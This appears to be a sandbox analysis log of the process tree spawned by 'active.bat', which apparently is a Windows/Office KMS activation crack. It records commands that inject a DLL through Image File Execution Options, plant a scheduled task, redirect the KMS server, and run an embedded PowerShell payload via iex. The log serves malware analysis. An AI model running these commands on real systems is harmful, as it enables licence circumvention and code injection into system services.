- Event Triggered Execution: Image File Execution Options Injection
PID:980
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v Debugger3⤵PID:1560
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4704
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDebug /t REG_DWORD /d 0x000000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3988
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierFlags /t REG_DWORD /d 0x800000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1300
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v GlobalFlag /t REG_DWORD /d 0x000001003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:816
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_Emulation /t REG_DWORD /d 13⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2272
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2636
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4036
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:3280
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon"3⤵PID:1648
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:3472
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':spptask\:.*'; [IO.File]::WriteAllText('SvcTrigger.xml',$f[1].Trim(),[System.Text.Encoding]::Unicode)"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4040
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger" /xml "C:\Windows\Temp\SvcTrigger.xml" /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3424
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:3868
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1480
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\Software Protection Platform" /v NoGenTicket /t REG_DWORD /d 1 /f3⤵PID:4528
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:3592
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:4272
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2240
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4388
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3004
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1552
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4964
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:2636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k 2>nul | FIND /I "CurrentVersion"3⤵
- System Location Discovery: System Language Discovery
PID:688 -
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k4⤵PID:544
-
-
C:\Windows\system32\find.exeFIND /I "CurrentVersion"4⤵PID:3544
-
-
-
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.1288" /v "CurrentState"3⤵PID:1300
-
-
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:3228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ECHO Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.12883⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.264" /v "CurrentState"3⤵PID:3620
-
-
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:4920
-
-
C:\Windows\system32\net.exenet start sppsvc /y3⤵PID:2960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start sppsvc /y4⤵PID:3360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value4⤵PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3896 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName4⤵PID:2884
-
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:3544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:996
-
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4548
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:2960
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\CVH /f Click2run /k3⤵
- Modifies registry key
PID:3984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4360 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2724 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3432 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:3984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3868 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- System Location Discovery: System Language Discovery
PID:2732 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:2884
-
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2236
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4996
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:844
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3988
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1560
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2760
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3620
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:980
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4036
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4740
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:400
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4524
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2272
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2724
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4408
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3472
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3444
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3652
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3868
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5064
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2884
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4844
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4688
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1200
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2736
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:2272
-
-
C:\Windows\system32\findstr.exefindstr 20193⤵PID:3920
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4408
-
-
C:\Windows\system32\findstr.exefindstr 20213⤵PID:3360
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:1452
-
-
C:\Windows\system32\findstr.exefindstr 20243⤵PID:1080
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"3⤵PID:2140
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value3⤵PID:4484
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:3868
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value3⤵PID:980
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:4844
-
-
C:\Windows\system32\find.exefind /i "Office 14"3⤵PID:5108
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:844
-
-
C:\Windows\system32\find.exefind /i "Office 15"3⤵PID:400
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:2736
-
-
C:\Windows\system32\find.exefind /i "Office 16"3⤵PID:3988
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3920
-
-
C:\Windows\system32\find.exefind /i "Office 19"3⤵PID:1516
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3360
-
-
C:\Windows\system32\find.exefind /i "Office 21"3⤵PID:1952
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:1648
-
-
C:\Windows\system32\find.exefind /i "Office 24"3⤵PID:5084
-
-
C:\Windows\system32\find.exefind /i "Office16ProPlusR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2052
-
-
C:\Windows\system32\find.exefind /i "Office16StandardR" "C:\Windows\Temp\sppchk.txt"3⤵PID:3392
-
-
C:\Windows\system32\find.exefind /i "Office16AccessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4684
-
-
C:\Windows\system32\find.exefind /i "Office16SkypeforBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2044
-
-
C:\Windows\system32\find.exefind /i "Office16ExcelR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2884
-
-
C:\Windows\system32\find.exefind /i "Office16OutlookR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4036
-
-
C:\Windows\system32\find.exefind /i "Office16PowerPointR" "C:\Windows\Temp\sppchk.txt"3⤵PID:3896
-
-
C:\Windows\system32\find.exefind /i "Office16PublisherR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4844
-
-
C:\Windows\system32\find.exefind /i "Office16WordR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2320
-
-
C:\Windows\system32\find.exefind /i "Office16ProfessionalR" "C:\Windows\Temp\sppchk.txt"3⤵PID:400
-
-
C:\Windows\system32\find.exefind /i "Office16HomeBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2960
-
-
C:\Windows\system32\find.exefind /i "Office16HomeStudentR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4408
-
-
C:\Windows\system32\find.exefind /i "Office16ProjectProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:1952
-
-
C:\Windows\system32\find.exefind /i "Office16ProjectStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:3444
-
-
C:\Windows\system32\find.exefind /i "Office16VisioProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5084
-
-
C:\Windows\system32\find.exefind /i "Office16VisioStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:1928
-
-
C:\Windows\system32\sc.exesc query ClickToRunSvc3⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\system32\sc.exesc query OfficeSvc3⤵
- Launches sc.exe
PID:3592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5064 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:980 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:780 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:2320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:400 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1080 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5084 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID4⤵
- Modifies registry key
PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2884 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs /v ActiveConfiguration4⤵
- Modifies registry key
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2736 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3984 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value3⤵
- System Location Discovery: System Language Discovery
PID:116 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService get Version /value4⤵PID:1952
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseStatus='1' AND PartialProductKey is not NULL" get Description3⤵PID:2760
-
-
C:\Windows\system32\findstr.exefindstr /V /R "^$"3⤵PID:5108
-
-
C:\Windows\system32\find.exefind /i "RETAIL channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:2024
-
-
C:\Windows\system32\find.exefind /i "RETAIL(MAK) channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:3444
-
-
C:\Windows\system32\find.exefind /i "TIMEBASED_SUB channel" "C:\Windows\Temp\crvRetail.txt"3⤵PID:2960
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[5])"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4856
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily3⤵PID:1560
-
-
C:\Windows\system32\findstr.exefindstr /V /R "^$"3⤵PID:3592
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:400
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2960
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Home2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4408
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:780
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2044
-
-
